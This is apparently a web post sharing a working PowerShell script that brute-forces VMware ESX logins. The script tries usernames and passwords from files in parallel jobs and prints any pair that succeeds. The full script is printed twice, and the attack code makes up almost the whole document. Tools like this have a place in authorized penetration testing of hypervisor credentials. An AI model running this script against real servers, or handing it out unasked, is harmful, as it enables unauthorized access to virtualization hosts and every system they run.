Brute Force ESX Username/Password
This script will brute force the connection to ESX. You can either give it a single username or a username file. Similarly, you can either give it a single password or a password file. You also have the ability to define how many jobs will run in parallel.
#———————————————————————————————
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#———————————————————————————————
#Parameter Declaration
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)
# Function to handle the jobs once they complete
# As the jobs finish (Completed, or Failed) they are handled by this routine
# Each Job has a child job that actually does the work, if that job
# does not have an error then we have found a successful user/pass combo
Function Handle-Jobs {
Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
$job = $_
if (!$job.ChildJobs[0].Error) {
# Found one!
Receive-Job $job -Keep | Out-Null
# Echo the user/pass combo stored the job name
echo "Found $($job.Name)"
#Clean up all the running jobs
Get-Job | Stop-Job
Get-Job | Remove-Job
#quit
exit
}
Remove-Job $job
}
}
# Make sure we have enough info passed in from the parameters
if (!$User -and !$UsersFile) {
throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
throw "Password or PasswordFile required."
}
# If the UsersFile and a Username are provided then use the UsersFile
# Convert UsersFile or single User into an array so we can use a loop
if ($UsersFile)
{
$Users = Get-Content $UsersFile
}
else
{
$Users = @($User)
}
# If the PasswordsFile and aPassword is provided then use the PasswordsFile
# Convert PasswordsFile or single Password into an array so we can use a loop
if ($PasswordsFile)
{
$Passwords = Get-Content $PasswordsFile
}
else
{
$Passwords = @($Password)
}
$Passwords | ForEach-Object {
$pass = $_
$Users | ForEach-Object {
$usr = $_
# If too many jobs running then wait for some to complete
while ((Get-Job).Count -ge $MaxJobs) {
Handle-Jobs
Start-Sleep -Seconds 5
}
# Start the job to attempt the connection
Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
}
}
"Everything has been queued, waiting for jobs to complete"
# Wait for the jobs to complete
Do {
Handle-Jobs
Start-Sleep -Seconds 5
} while (Get-Job)
#———————————————————————————————
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#———————————————————————————————
#Parameter Declaration
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)
# Function to handle the jobs once they complete
# As the jobs finish (Completed, or Failed) they are handled by this routine
# Each Job has a child job that actually does the work, if that job
# does not have an error then we have found a successful user/pass combo
Function Handle-Jobs {
Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
$job = $_
if (!$job.ChildJobs[0].Error) {
# Found one!
Receive-Job $job -Keep | Out-Null
# Echo the user/pass combo stored the job name
echo "Found $($job.Name)"
#Clean up all the running jobs
Get-Job | Stop-Job
Get-Job | Remove-Job
#quit
exit
}
Remove-Job $job
}
}
# Make sure we have enough info passed in from the parameters
if (!$User -and !$UsersFile) {
throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
throw "Password or PasswordFile required."
}
# If the UsersFile and a Username are provided then use the UsersFile
# Convert UsersFile or single User into an array so we can use a loop
if ($UsersFile)
{
$Users = Get-Content $UsersFile
}
else
{
$Users = @($User)
}
# If the PasswordsFile and aPassword is provided then use the PasswordsFile
# Convert PasswordsFile or single Password into an array so we can use a loop
if ($PasswordsFile)
{
$Passwords = Get-Content $PasswordsFile
}
else
{
$Passwords = @($Password)
}
$Passwords | ForEach-Object {
$pass = $_
$Users | ForEach-Object {
$usr = $_
# If too many jobs running then wait for some to complete
while ((Get-Job).Count -ge $MaxJobs) {
Handle-Jobs
Start-Sleep -Seconds 5
}
# Start the job to attempt the connection
Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
}
}
"Everything has been queued, waiting for jobs to complete"
# Wait for the jobs to complete
Do {
Handle-Jobs
Start-Sleep -Seconds 5
} while (Get-Job)
Comments